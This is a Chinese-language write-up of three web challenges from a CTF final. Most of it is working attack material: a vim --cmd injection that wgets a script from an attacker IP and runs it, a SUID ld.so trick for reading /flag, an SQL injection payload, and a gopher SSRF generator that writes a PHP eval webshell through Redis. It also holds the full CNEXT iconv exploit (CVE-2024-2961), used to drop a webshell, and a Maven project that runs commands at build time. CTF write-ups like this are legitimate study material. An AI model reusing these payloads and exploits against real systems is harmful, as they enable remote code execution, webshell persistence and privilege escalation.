jqctf-final

学长们打到第一了，tql。

由于很多环节都没有，这里就做个简单的wp记录。

ldvim

签到题。

<?php
highlight_file(__FILE__);

$filename = $_REQUEST["filename"];
if (preg_match("/('|`|\n|\t|\\\$|~|@|#|;|&|\\||\\=|\\*|\\%|\\\^|\\(|\\)|{|\\[|\\\\|>|<)/is", $filename)){
    die("no");
}

if (!isset($filename)){
    $filename = "--help";
}

//view the file
system("vim " . $filename);

# curl命令下载php脚本到 /tmp
/?filename=--cmd "! wget http://30.222.0.114:8888/test.php -O /tmp/a123.php"
# 执行
/?filename=--cmd "! php /tmp/a123.php"
# suid提权，ld-2.31.so有s标
/lib/x86_64-linux-gnu/ld-2.31.so /bin/cat /flag

photocms

hint说开了redis。

photo.php可以读文件，也存在sql注入:

<?php
class clearall{
    public $filepath;
    public $back;
    public function __construct()
    {
        $this->back = new bak();
    }
    public function __destruct()
    {
        if ($this->back->backup($this->filepath)){
                @unlink($this->filepath);
                die('error!');
        }
    }
  
}
class bak{
  public function backup($name)
  {
    copy($name,"/var/www/back/".$name);
  }
}
if(isset($_GET['download_url'])){
  $file=$_GET['download_url'];
  if(strpos(base64_decode($file),'gopher') !== false){
    die('1');
  }
  if(strpos(base64_decode($file),'phar') !== false){
    die('1');
  }
  if(strpos(base64_decode($file),'flag') !== false){
    die('1');
  }
  header('Content-Description: File Transfer');
  header('Content-Type: application/octet-stream');
  header('Content-Transfer-Encoding: binary' ); 
  header('Expires: 0');
  header('Cache-Control: must-revalidate');
  ob_clean(); 
  flush(); 
  readfile("/var/www/html/images/".base64_decode($file));
  exit; 
}
if(isset($_POST['photo'])){
    $photo=$_POST['photo'];
    try {
        $pdo = new PDO('mysql:host=localhost;dbname=photo', 'photo', 'root');
        $sql = "INSERT INTO filelist (filedata) VALUES ('$photo')";
        $pdo->exec($sql);
        file_put_contents("/var/www/html/images/1.jpg",base64_encode($photo));
        echo "upload OK";
    } catch (PDOException $e) {
        echo "Error: " . $e->getMessage();
    }

}
if(isset($_GET['pdoceshi'])){
  $dbms="mysql";
  $host='localhost';
  $dbName='photo';
  $user='photo';
  $pass='root';
  $connectpdo=$_POST['pdo'];
  try {
      $conne = new PDO($connectpdo, $user, $pass);
      if($conne){
        echo "PDO OK!";
      }
  } catch (PDOException $e) {
      die ("Error!: " . $e->getMessage() . "<br/>");
  }
}
?>

文件上传和unlink，很容易想到打phar，但是测试后好像phar给ban了。

index.php有file_get_contents：

<!DOCTYPE html>
<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta charset="utf-8">
<meta name="keywords" content="Transact Solutions a Responsive web template, Bootstrap Web Templates, Flat Web Templates, Android Compatible web template, 
Smartphone Compatible web template, free webdesigns for Nokia, Samsung, LG, SonyEricsson, Motorola web design" />
<link href="css/bootstrap.min.css" rel="stylesheet" type="text/css" media="all">
<link href="css/font-awesome.min.css" rel="stylesheet" type="text/css" media="all">
<link href="css/style.css" rel="stylesheet" type="text/css" media="all"/>
</head>
<body>
 <section class="contact" id="contact">
 <div class="container">
 <h3 class="xyz">base64图片生成系统</h3>
 <div class="row">
 <div class="col-lg-6 col-md-6 col-sm-6 dghgffg">
 <div class="contactus9">
<h3>base64图片预览</h3>
<img src="data:image/png;base64,<?php echo base64_encode(file_get_contents('/var/www/html/images/1.jpg'));?>"/>
</div>
<div class="contactus2">
<h3>Download</h3>
<i class="fa fa-flag" aria-hidden="true"></i> <a href="./photo.php?download_url=MS5qcGc=">点击下载</a><br>
</div>


 </div>
  <div class="col-lg-6 col-md-6 col-sm-6 sdtrthjh">
  <form action="./photo.php" method="post">
  <div class="contactus10">
  <h3>图片编码</h3>
  </div>

                        <div class="form-group">
                            <label for="name">
                                base64图片</label>
                            <textarea name="photo" id="message" class="form-control" rows="9" cols="25" required="required"
                               ></textarea>
                        </div>
                        <button type="submit" class="btn btn-primary pull-right" id="btnContactUs">
                          点击提交</button>
                           </form> 
  </div>
  
 </div>
 </div>
  </section>
 <div class="map">

 </div>


<script src="js/jquery.min.js"></script>
<script src="js/jquery.easing.min.js"></script>
<script src="js/move-top.js"></script>
<script src="js/bootstrap.min.js"></script>
<script src="js/grayscale.js"></script>
<script src="js/SmoothScroll.min.js"></script>
<script>
<!-- projects -->
$(document).ready(function(){
  $("[class^='thumbnail-']").click(function(){
    $("[class^='thumbnail-']").slideToggle("fast");
    $(this).next("[class^='large-']").slideToggle();
  });
  
  $(".close").click(function(){
    $("[class^='large-']:visible").toggle();
    $("[class^='thumbnail-']").fadeToggle("fast");; 
  }); 
  
});

new WOW().init();
</script>
<script type="text/javascript">
$(document).ready(function() {
var defaults = {
containerID: 'toTop', // fading element id
containerHoverID: 'toTopHover', // fading element hover id
scrollSpeed: 1200,
easingType: 'linear' 
};
$().UItoTop({ easingType: 'easeOutQuart' });
});
</script>

</body>
</html>

可以打sql注入：

photo=1'and (select sleep(3)));#

redis :6379

requirepass 79a1c5a9ad7370f0ff80ea96a10a481a

SSRF：

import urllib
protocol="gopher://"  # 使用的协议
ip="127.0.0.1"
port="6379"   # 目标redis的端口号
shell="\n\n<?php phpinfo();\n@eval($_POST[1]);?>\n\n"
filename="shell.php"   # shell的名字
path="/var"      # 写入的路径
passwd="79a1c5a9ad7370f0ff80ea96a10a481a"   # 如果有密码 则填入
# 我们的恶意命令
cmd=["flushall",
     "set 1 {}".format(shell.replace(" ","${IFS}")),
     "config set dir {}".format(path),
     "config set dbfilename {}".format(filename),
     "save"
     ]
if passwd:
    cmd.insert(0,"AUTH {}".format(passwd))
payload=protocol+ip+":"+port+"/_"
def redis_format(arr):
    CRLF="\r\n"
    redis_arr = arr.split(" ")
    cmd=""
    cmd+="*"+str(len(redis_arr))
    for x in redis_arr:
        cmd+=CRLF+"$"+str(len((x.replace("${IFS}"," "))))+CRLF+x.replace("${IFS}"," ")
    cmd+=CRLF
    return cmd

if __name__=="__main__":
    for x in cmd:
        payload += urllib.quote(redis_format(x))
    print payload
    print urllib.quote("二次url编码后的结果:\n" + payload)

通过dsn可以触发wrapper 从而来触发iconv的cve，又是CVE-2024-2961……

把/proc/self/maps和libc下载下来，然后改改iconv的exp，手动打exploit：

#!/usr/bin/env python3
#
# CNEXT: PHP file-read to RCE
# Date: 2024-05-27
# Author: Charles FOL @cfreal_ (LEXFO/AMBIONICS)
#
# TODO Parse LIBC to know if patched
#
# INFORMATIONS
#
# To use, implement the Remote class, which tells the exploit how to send the payload.
#
# REQUIREMENTS
#
# Requires ten: https://github.com/cfreal/ten
#

from __future__ import annotations

import base64
import zlib
from dataclasses import dataclass

from pwn import *
from requests.exceptions import ChunkedEncodingError, ConnectionError
from ten import *


HEAP_SIZE = 2 * 1024 * 1024
BUG = "劄".encode("utf-8")


class Remote:
    """A helper class to send the payload and download files.
    
    The logic of the exploit is always the same, but the exploit needs to know how to
    download files (/proc/self/maps and libc) and how to send the payload.
    
    The code here serves as an example that attacks a page that looks like:
    
    ```php
    <?php
    
    $data = file_get_contents($_POST['file']);
    echo "File contents: $data";
    ```
    
    Tweak it to fit your target, and start the exploit.
    """

    def __init__(self, url: str) -> None:
        self.url = url
        self.session = Session()

    def send(self, path: str) -> Response:
        """Sends given `path` to the HTTP server. Returns the response.
        """
        return self.session.post(self.url, data={"pdo": path})
        
    def download(self, path: str) -> bytes:
        """Returns the contents of a remote file.
        """
        path = f"php://filter/convert.base64-encode/resource={path}"
        response = self.send(path)
        data = response.re.search(b"File contents: (.*)", flags=re.S).group(1)
        return base64.decode(data)

@entry
@arg("url", "Target URL")
@arg("command", "Command to run on the system; limited to 0x140 bytes")
@arg("sleep_time", "Time to sleep to assert that the exploit worked. By default, 1.")
@arg("heap", "Address of the main zend_mm_heap structure.")
@arg(
    "pad",
    "Number of 0x100 chunks to pad with. If the website makes a lot of heap "
    "operations with this size, increase this. Defaults to 20.",
)
@dataclass
class Exploit:
    """CNEXT exploit: RCE using a file read primitive in PHP."""

    url: str
    command: str
    sleep: int = 1
    heap: str = None
    pad: int = 20

    def __post_init__(self):
        self.remote = Remote(self.url)
        self.log = logger("EXPLOIT")
        self.info = {}
        self.heap = self.heap and int(self.heap, 16)

    def check_vulnerable(self) -> None:
        """Checks whether the target is reachable and properly allows for the various
        wrappers and filters that the exploit needs.
        """
        
        def safe_download(path: str) -> bytes:
            try:
                return self.remote.download(path)
            except ConnectionError:
                failure("Target not [b]reachable[/] ?")
            

        def check_token(text: str, path: str) -> bool:
            result = safe_download(path)
            return text.encode() == result

        text = tf.random.string(50).encode()
        base64 = b64(text, misalign=True).decode()
        path = f"data:text/plain;base64,{base64}"

        result = safe_download(path)
        
        if text not in result:
            msg_failure("Remote.download did not return the test string")
            print("--------------------")
            print(f"Expected test string: {text}")
            print(f"Got: {result}")
            print("--------------------")
            failure("If your code works fine, it means that the [i]data://[/] wrapper does not work")

        msg_info("The [i]data://[/] wrapper works")

        text = tf.random.string(50)
        base64 = b64(text.encode(), misalign=True).decode()
        path = f"php://filter//resource=data:text/plain;base64,{base64}"
        if not check_token(text, path):
            failure("The [i]php://filter/[/] wrapper does not work")

        msg_info("The [i]php://filter/[/] wrapper works")

        text = tf.random.string(50)
        base64 = b64(compress(text.encode()), misalign=True).decode()
        path = f"php://filter/zlib.inflate/resource=data:text/plain;base64,{base64}"

        if not check_token(text, path):
            failure("The [i]zlib[/] extension is not enabled")

        msg_info("The [i]zlib[/] extension is enabled")

        msg_success("Exploit preconditions are satisfied")

    def get_file(self, path: str) -> bytes:
        with msg_status(f"Downloading [i]{path}[/]..."):
            return self.remote.download(path)

    def get_regions(self) -> list[Region]:
        """Obtains the memory regions of the PHP process by querying /proc/self/maps."""
        with open("maps", "rb") as f:
            maps = f.read()
        maps = maps.decode()
        PATTERN = re.compile(
            r"^([a-f0-9]+)-([a-f0-9]+)\b" r".*" r"\s([-rwx]{3}[ps])\s" r"(.*)"
        )
        regions = []

        for region in table.split(maps, strip=True):
            if match := PATTERN.match(region):
                start = int(match.group(1), 16)
                stop = int(match.group(2), 16)
                permissions = match.group(3)
                path = match.group(4)
                if "/" in path or "[" in path:
                    path = path.rsplit(" ", 1)[-1]
                else:
                    path = ""
                current = Region(start, stop, permissions, path)
                regions.append(current)
            else:
                print(maps)
                failure("Unable to parse memory mappings")

        self.log.info(f"Got {len(regions)} memory regions")
        print(regions)
        return regions

    def get_symbols_and_addresses(self) -> None:
        """Obtains useful symbols and addresses from the file read primitive."""
        regions = self.get_regions()

        LIBC_FILE = "F:\\zzzworkings\\CTF\\races\\JQCTF_final\\photocms\\exp\\libc-2.27.so"

        # PHP's heap

        self.info["heap"] = self.heap or self.find_main_heap(regions)

        # Libc

        libc = self._get_region(regions, "libc-2", "libc.so")

        #self.download_file(libc.path, LIBC_FILE)

        self.info["libc"] = ELF(LIBC_FILE, checksec=False)
        #self.info["libc"] = ELF("libc-2.31.so", checksec=False)
        self.info["libc"].address = libc.start

    def _get_region(self, regions: list[Region], *names: str) -> Region:
        """Returns the first region whose name matches one of the given names."""
        for region in regions:
            if any(name in region.path for name in names):
                break
        else:
            failure("Unable to locate region")

        return region

    def download_file(self, remote_path: str, local_path: str) -> None:
        """Downloads `remote_path` to `local_path`"""
        data = self.get_file(remote_path)
        #print(data)
        with open(local_path,"wb") as f:
            f.write(data)
        f.close()
        #Path(local_path).write(data)

    def find_main_heap(self, regions: list[Region]) -> Region:
        # Any anonymous RW region with a size superior to the base heap size is a
        # candidate. The heap is at the bottom of the region.
        heaps = [
            region.stop - HEAP_SIZE + 0x40
            for region in reversed(regions)
            if region.permissions == "rw-p"
            and region.size >= HEAP_SIZE
            and region.stop & (HEAP_SIZE-1) == 0
            and region.path == ""
        ]

        if not heaps:
            failure("Unable to find PHP's main heap in memory")

        first = heaps[0]

        if len(heaps) > 1:
            heaps = ", ".join(map(hex, heaps))
            msg_info(f"Potential heaps: [i]{heaps}[/] (using first)")
        else:
            msg_info(f"Using [i]{hex(first)}[/] as heap")

        return first

    def run(self) -> None:
        #self.check_vulnerable()
        self.get_symbols_and_addresses()

        self.exploit()

    def build_exploit_path(self) -> str:
        """

        On each step of the exploit, a filter will process each chunk one after the
        other. Processing generally involves making some kind of operation either
        on the chunk or in a destination chunk of the same size. Each operation is
        applied on every single chunk; you cannot make PHP apply iconv on the first 10
        chunks and leave the rest in place. That's where the difficulties come from.

        Keep in mind that we know the address of the main heap, and the libraries.
        ASLR/PIE do not matter here.

        The idea is to use the bug to make the freelist for chunks of size 0x100 point
        lower. For instance, we have the following free list:

        ... -> 0x7fffAABBCC900 -> 0x7fffAABBCCA00 -> 0x7fffAABBCCB00

        By triggering the bug from chunk ..900, we get:

        ... -> 0x7fffAABBCCA00 -> 0x7fffAABBCCB48 -> ???

        That's step 3.

        Now, in order to control the free list, and make it point whereever we want,
        we need to have previously put a pointer at address 0x7fffAABBCCB48. To do so,
        we'd have to have allocated 0x7fffAABBCCB00 and set our pointer at offset 0x48.
        That's step 2.

        Now, if we were to perform step2 an then step3 without anything else, we'd have
        a problem: after step2 has been processed, the free list goes bottom-up, like:

        0x7fffAABBCCB00 -> 0x7fffAABBCCA00 -> 0x7fffAABBCC900

        We need to go the other way around. That's why we have step 1: it just allocates
        chunks. When they get freed, they reverse the free list. Now step2 allocates in
        reverse order, and therefore after step2, chunks are in the correct order.

        Another problem comes up.

        To trigger the overflow in step3, we convert from UTF-8 to ISO-2022-CN-EXT.
        Since step2 creates chunks that contain pointers and pointers are generally not
        UTF-8, we cannot afford to have that conversion happen on the chunks of step2.
        To avoid this, we put the chunks in step2 at the very end of the chain, and
        prefix them with `0\n`. When dechunked (right before the iconv), they will
        "disappear" from the chain, preserving them from the character set conversion
        and saving us from an unwanted processing error that would stop the processing
        chain.

        After step3 we have a corrupted freelist with an arbitrary pointer into it. We
        don't know the precise layout of the heap, but we know that at the top of the
        heap resides a zend_mm_heap structure. We overwrite this structure in two ways.
        Its free_slot[] array contains a pointer to each free list. By overwriting it,
        we can make PHP allocate chunks whereever we want. In addition, its custom_heap
        field contains pointers to hook functions for emalloc, efree, and erealloc
        (similarly to malloc_hook, free_hook, etc. in the libc). We overwrite them and
        then overwrite the use_custom_heap flag to make PHP use these function pointers
        instead. We can now do our favorite CTF technique and get a call to
        system(<chunk>).
        We make sure that the "system" command kills the current process to avoid other
        system() calls with random chunk data, leading to undefined behaviour.

        The pad blocks just "pad" our allocations so that even if the heap of the
        process is in a random state, we still get contiguous, in order chunks for our
        exploit.

        Therefore, the whole process described here CANNOT crash. Everything falls
        perfectly in place, and nothing can get in the middle of our allocations.
        """

        LIBC = self.info["libc"]

        ADDR_EFREE = LIBC.symbols["__libc_system"]
        ADDR_EREALLOC = LIBC.symbols["__libc_realloc"]
        ADDR_EMALLOC = LIBC.symbols["__libc_malloc"]

        ADDR_HEAP = self.info["heap"]
        ADDR_FREE_SLOT = ADDR_HEAP + 0x20
        ADDR_CUSTOM_HEAP = ADDR_HEAP + 0x0168

        ADDR_FAKE_BIN = ADDR_FREE_SLOT - 0x10

        CS = 0x100

        # Pad needs to stay at size 0x100 at every step
        pad_size = CS - 0x18
        pad = b"\x00" * pad_size
        pad = chunked_chunk(pad, len(pad) + 6)
        pad = chunked_chunk(pad, len(pad) + 6)
        pad = chunked_chunk(pad, len(pad) + 6)
        pad = compressed_bucket(pad)

        step1_size = 1
        step1 = b"\x00" * step1_size
        step1 = chunked_chunk(step1)
        step1 = chunked_chunk(step1)
        step1 = chunked_chunk(step1, CS)
        step1 = compressed_bucket(step1)

        # Since these chunks contain non-UTF-8 chars, we cannot let it get converted to
        # ISO-2022-CN-EXT. We add a `0\n` that makes the 4th and last dechunk "crash"

        step2_size = 0x48
        step2 = b"\x00" * (step2_size + 8)
        step2 = chunked_chunk(step2, CS)
        step2 = chunked_chunk(step2)
        step2 = compressed_bucket(step2)

        step2_write_ptr = b"0\n".ljust(step2_size, b"\x00") + p64(ADDR_FAKE_BIN)
        step2_write_ptr = chunked_chunk(step2_write_ptr, CS)
        step2_write_ptr = chunked_chunk(step2_write_ptr)
        step2_write_ptr = compressed_bucket(step2_write_ptr)

        step3_size = CS

        step3 = b"\x00" * step3_size
        assert len(step3) == CS
        step3 = chunked_chunk(step3)
        step3 = chunked_chunk(step3)
        step3 = chunked_chunk(step3)
        step3 = compressed_bucket(step3)

        step3_overflow = b"\x00" * (step3_size - len(BUG)) + BUG
        assert len(step3_overflow) == CS
        step3_overflow = chunked_chunk(step3_overflow)
        step3_overflow = chunked_chunk(step3_overflow)
        step3_overflow = chunked_chunk(step3_overflow)
        step3_overflow = compressed_bucket(step3_overflow)

        step4_size = CS
        step4 = b"=00" + b"\x00" * (step4_size - 1)
        step4 = chunked_chunk(step4)
        step4 = chunked_chunk(step4)
        step4 = chunked_chunk(step4)
        step4 = compressed_bucket(step4)

        # This chunk will eventually overwrite mm_heap->free_slot
        # it is actually allocated 0x10 bytes BEFORE it, thus the two filler values
        step4_pwn = ptr_bucket(
            0x200000,
            0,
            # free_slot
            0,
            0,
            ADDR_CUSTOM_HEAP,  # 0x18
            0,
            0,
            0,
            0,
            0,
            0,
            0,
            0,
            0,
            0,
            0,
            0,
            0,
            ADDR_HEAP,  # 0x140
            0,
            0,
            0,
            0,
            0,
            0,
            0,
            0,
            0,
            0,
            0,
            0,
            0,
            size=CS,
        )

        step4_custom_heap = ptr_bucket(
            ADDR_EMALLOC, ADDR_EFREE, ADDR_EREALLOC, size=0x18
        )

        step4_use_custom_heap_size = 0x140

        COMMAND = self.command
        COMMAND = f"kill -9 $PPID; {COMMAND}"
        if self.sleep:
            COMMAND = f"sleep {self.sleep}; {COMMAND}"
        COMMAND = COMMAND.encode() + b"\x00"
        print(COMMAND)
        assert (
            len(COMMAND) <= step4_use_custom_heap_size
        ), f"Command too big ({len(COMMAND)}), it must be strictly inferior to {hex(step4_use_custom_heap_size)}"
        COMMAND = COMMAND.ljust(step4_use_custom_heap_size, b"\x00")

        step4_use_custom_heap = COMMAND
        step4_use_custom_heap = qpe(step4_use_custom_heap)
        step4_use_custom_heap = chunked_chunk(step4_use_custom_heap)
        step4_use_custom_heap = chunked_chunk(step4_use_custom_heap)
        step4_use_custom_heap = chunked_chunk(step4_use_custom_heap)
        step4_use_custom_heap = compressed_bucket(step4_use_custom_heap)

        pages = (
            step4 * 3
            + step4_pwn
            + step4_custom_heap
            + step4_use_custom_heap
            + step3_overflow
            + pad * self.pad
            + step1 * 3
            + step2_write_ptr
            + step2 * 2
        )

        resource = compress(compress(pages))
        resource = b64(resource)
        resource = f"data:text/plain;base64,{resource.decode()}"

        filters = [
            # Create buckets
            "zlib.inflate",
            "zlib.inflate",
            
            # Step 0: Setup heap
            "dechunk",
            "convert.iconv.latin1.latin1",
            
            # Step 1: Reverse FL order
            "dechunk",
            "convert.iconv.latin1.latin1",
            
            # Step 2: Put fake pointer and make FL order back to normal
            "dechunk",
            "convert.iconv.latin1.latin1",
            
            # Step 3: Trigger overflow
            "dechunk",
            "convert.iconv.UTF-8.ISO-2022-CN-EXT",
            
            # Step 4: Allocate at arbitrary address and change zend_mm_heap
            "convert.quoted-printable-decode",
            "convert.iconv.latin1.latin1",
        ]
        filters = "|".join(filters)
        path = f"uri:php://filter/read={filters}/resource={resource}"

        return path

    @inform("Triggering...")
    def exploit(self) -> None:
        path = self.build_exploit_path()
        start = time.time()
        print(path)
        try:
            self.remote.send(path)
        except (ConnectionError, ChunkedEncodingError):
            pass
        
        msg_print()

        if not self.sleep:
            msg_print("    [b white on black] EXPLOIT [/][b white on green] SUCCESS [/] [i](probably)[/]")
        elif start + self.sleep <= time.time():

            msg_print("    [b white on black] EXPLOIT [/][b white on green] SUCCESS [/]")
        else:
            # Wrong heap, maybe? If the exploited suggested others, use them!
            msg_print("    [b white on black] EXPLOIT [/][b white on red] FAILURE [/]")
        #print(1)
        msg_print()


def compress(data) -> bytes:
    """Returns data suitable for `zlib.inflate`.
    """
    # Remove 2-byte header and 4-byte checksum
    return zlib.compress(data, 9)[2:-4]


def b64(data: bytes, misalign=True) -> bytes:
    payload = base64.encode(data)
    if not misalign and payload.endswith("="):
        raise ValueError(f"Misaligned: {data}")
    return payload.encode()


def compressed_bucket(data: bytes) -> bytes:
    """Returns a chunk of size 0x8000 that, when dechunked, returns the data."""
    return chunked_chunk(data, 0x8000)


def qpe(data: bytes) -> bytes:
    """Emulates quoted-printable-encode.
    """
    return "".join(f"={x:02x}" for x in data).upper().encode()


def ptr_bucket(*ptrs, size=None) -> bytes:
    """Creates a 0x8000 chunk that reveals pointers after every step has been ran."""
    if size is not None:
        assert len(ptrs) * 8 == size
    bucket = b"".join(map(p64, ptrs))
    bucket = qpe(bucket)
    bucket = chunked_chunk(bucket)
    bucket = chunked_chunk(bucket)
    bucket = chunked_chunk(bucket)
    bucket = compressed_bucket(bucket)

    return bucket


def chunked_chunk(data: bytes, size: int = None) -> bytes:
    """Constructs a chunked representation of the given chunk. If size is given, the
    chunked representation has size `size`.
    For instance, `ABCD` with size 10 becomes: `0004\nABCD\n`.
    """
    # The caller does not care about the size: let's just add 8, which is more than
    # enough
    if size is None:
        size = len(data) + 8
    keep = len(data) + len(b"\n\n")
    size = f"{len(data):x}".rjust(size - keep, "0")
    return size.encode() + b"\n" + data + b"\n"


@dataclass
class Region:
    """A memory region."""

    start: int
    stop: int
    permissions: str
    path: str

    @property
    def size(self) -> int:
        return self.stop - self.start


Exploit()

python cnext-exploit.py http://30.222.0.20:59687/photo.php?pdoceshi "echo PD9waHAgQGV2YWwoJF9QT1NUWydhdHRhY2snXSk7Pz4=|base64 -d > /var/www/html/shell.php"

maven-packer

JDK17。

hint:

1. maven 插件
2. 关注 Dockerfile
3. 题目本身禁止对外发起任何连接
4. docker 国内镜像 registry.cn-hangzhou.aliyuncs.com/exp10it/maven-packer

IndexController.java：

package io.exp10it.ctf;

import net.lingala.zip4j.ZipFile;
import net.lingala.zip4j.model.FileHeader;
import net.lingala.zip4j.model.UnzipParameters;
import net.lingala.zip4j.model.ZipParameters;
import org.springframework.http.*;
import org.springframework.stereotype.Controller;
import org.springframework.util.FileSystemUtils;
import org.springframework.web.bind.annotation.*;
import org.springframework.web.multipart.MultipartFile;

import java.io.File;
import java.io.InputStream;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.Arrays;

@Controller
public class IndexController {
    private static final File UPLOADS = new File("/tmp/uploads");
    private static final File PROJECTS = new File("/tmp/projects");

    @RequestMapping("/")
    public ResponseEntity<String> index() {
        return new ResponseEntity<>("Hello, World!", HttpStatus.OK);
    }

    @PostMapping("/pack")
    @ResponseBody
    public ResponseEntity pack(@RequestParam("file") MultipartFile uploadFile) throws Exception {
        FileSystemUtils.deleteRecursively(UPLOADS);
        FileSystemUtils.deleteRecursively(PROJECTS);
        UPLOADS.mkdirs();
        PROJECTS.mkdirs();

        File projectFile = new File(UPLOADS, String.format("%s.zip", RandomUtil.randomStr(12)));
        File projectDir = new File(PROJECTS, RandomUtil.randomStr(12));
        uploadFile.transferTo(projectFile);

        try (ZipFile zipFile = new ZipFile(projectFile)) {
            UnzipParameters parameters = new UnzipParameters();
            parameters.setExtractSymbolicLinks(false);

            for (FileHeader fileHeader : zipFile.getFileHeaders()) {
                if (!fileHeader.isDirectory()) {
                    try (InputStream input = zipFile.getInputStream(fileHeader)) {
                        byte[] data = input.readAllBytes();
                        if (!Arrays.equals(new String(data).getBytes(), data)) {
                            return new ResponseEntity<>("invalid zip file", HttpStatus.OK);
                        }
                    }
                }
            }

            zipFile.extractAll(projectDir.getAbsolutePath(), parameters);
        }

        new ProcessBuilder("mvn", "package", "-Dmaven.test.skip=true", "--offline")
                .directory(projectDir)
                .start()
                .waitFor();

        File targetDir = Paths.get(projectDir.getAbsolutePath(), "target").toFile();
        if (!targetDir.exists()) {
            return new ResponseEntity<>("target dir not found", HttpStatus.NOT_FOUND);
        }

        File targetZipFile = new File(projectDir, "target.zip");
        try (ZipFile zipFile = new ZipFile(targetZipFile)) {
            ZipParameters parameters = new ZipParameters();
            parameters.setSymbolicLinkAction(ZipParameters.SymbolicLinkAction.INCLUDE_LINK_ONLY);
            zipFile.addFolder(targetDir);
        }

        return new ResponseEntity<>(Files.readAllBytes(Paths.get(targetZipFile.getAbsolutePath())), HttpStatus.OK);
    }
}

net.lingala.zip4j 这个包似乎无法zip slip

报错

net.lingala.zip4j.exception.ZipException: illegal file name that breaks out of the target directory: ../a.txt

maven.config可以加载配置：

root@ca29ecffef7e:/tmp/test# ls -al
total 20
drwxr-xr-x 3 root root 4096 Aug  4 03:49 .
drwxrwxrwt 1 root root 4096 Aug  4 04:09 ..
drwxr-xr-x 2 root root 4096 Aug  4 04:09 .mvn
-rw-r--r-- 1 root root  859 Aug  4 03:47 pom.xml
root@ca29ecffef7e:/tmp/test# ls -al .mvn/
total 12
drwxr-xr-x 2 root root 4096 Aug  4 04:09 .
drwxr-xr-x 3 root root 4096 Aug  4 03:49 ..
-rw-r--r-- 1 root root  165 Aug  4 03:45 maven.config

这个大小限制了，maybe是要自己写一个maven插件过去？

spring.servlet.multipart.max-file-size=128KB
spring.servlet.multipart.max-request-size=256KB

远程环境有 spring-boot-maven-plugin 这个插件，利用这个插件可以在mvn package时运行当前项目。

后续可以通过将命令执行结果写入target目录来实现回显。

poc3.zip：

pom.xml:

<project xmlns="http://maven.apache.org/POM/4.0.0"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
    <modelVersion>4.0.0</modelVersion>

    <groupId>com.example</groupId>
    <artifactId>demo</artifactId>
    <version>0.0.1-SNAPSHOT</version>
    <packaging>jar</packaging>

    <name>demo</name>
    <description>Demo project for Spring Boot</description>

    <parent>
        <groupId>org.springframework.boot</groupId>
        <artifactId>spring-boot-starter-parent</artifactId>
        <version>3.3.1</version>
        <relativePath/> <!-- lookup parent from repository -->
    </parent>

    <properties>
        <java.version>17</java.version>
    </properties>

    <dependencies>
        <dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter</artifactId>
        </dependency>
        <!-- Add other dependencies as needed -->
    </dependencies>

<build>
    <plugins>
        <!-- Spring Boot Plugin -->
        <plugin>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-maven-plugin</artifactId>
            <!-- <version>3.3.1</version> -->
            <executions>
                <execution>
                    <goals>
                        <!-- 指定运行的目标 -->
                        <goal>run</goal>
                    </goals>
                    <!-- 配置该插件执行的生命周期阶段 -->
                    <phase>package</phase>
                </execution>
            </executions>
        </plugin>
    </plugins>
</build>

</project>

MavenPackerApplication.java：

package com.example;

import org.springframework.boot.SpringApplication;
import org.springframework.boot.autoconfigure.SpringBootApplication;

import java.io.File;
import java.io.IOException;

@SpringBootApplication
public class MavenPackerApplication {

    public static void main(String[] args) {

        // Example command to execute
        String command = "/readflag";
        File outputFile = new File("./target/flag.txt");

        // Execute the command
        executeCommand(command, outputFile);

        SpringApplication.run(MavenPackerApplication.class, args);


    }

    private static void executeCommand(String command, File outputFile) {
        // Create a ProcessBuilder with the command
        ProcessBuilder processBuilder = new ProcessBuilder(command.split(" "));
        
        // Redirect output to the specified file
        processBuilder.redirectOutput(outputFile);
        processBuilder.redirectErrorStream(true);
        
        try {
            // Start the process
            Process process = processBuilder.start();
            
            // Wait for the process to complete
            int exitCode = process.waitFor();
            System.out.println("Process exited with code: " + exitCode);
        } catch (IOException | InterruptedException e) {
            e.printStackTrace();
        }
    }
}

settings.xml：

<settings xmlns="http://maven.apache.org/SETTINGS/1.0.0"
          xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
          xsi:schemaLocation="http://maven.apache.org/SETTINGS/1.0.0 http://maven.apache.org/xsd/settings-1.0.0.xsd">
    <localRepository>/home/app/.m2/repository</localRepository>
</settings>

exp:

import requests

f = {"file": open("poc3.zip", "rb")}

p = {"http": "http://127.0.0.1:8080"}


res = requests.post("http://30.222.0.20:45807/pack", files=f, proxies=p)

with open("res.zip", "wb") as f:
    f.write(res.content)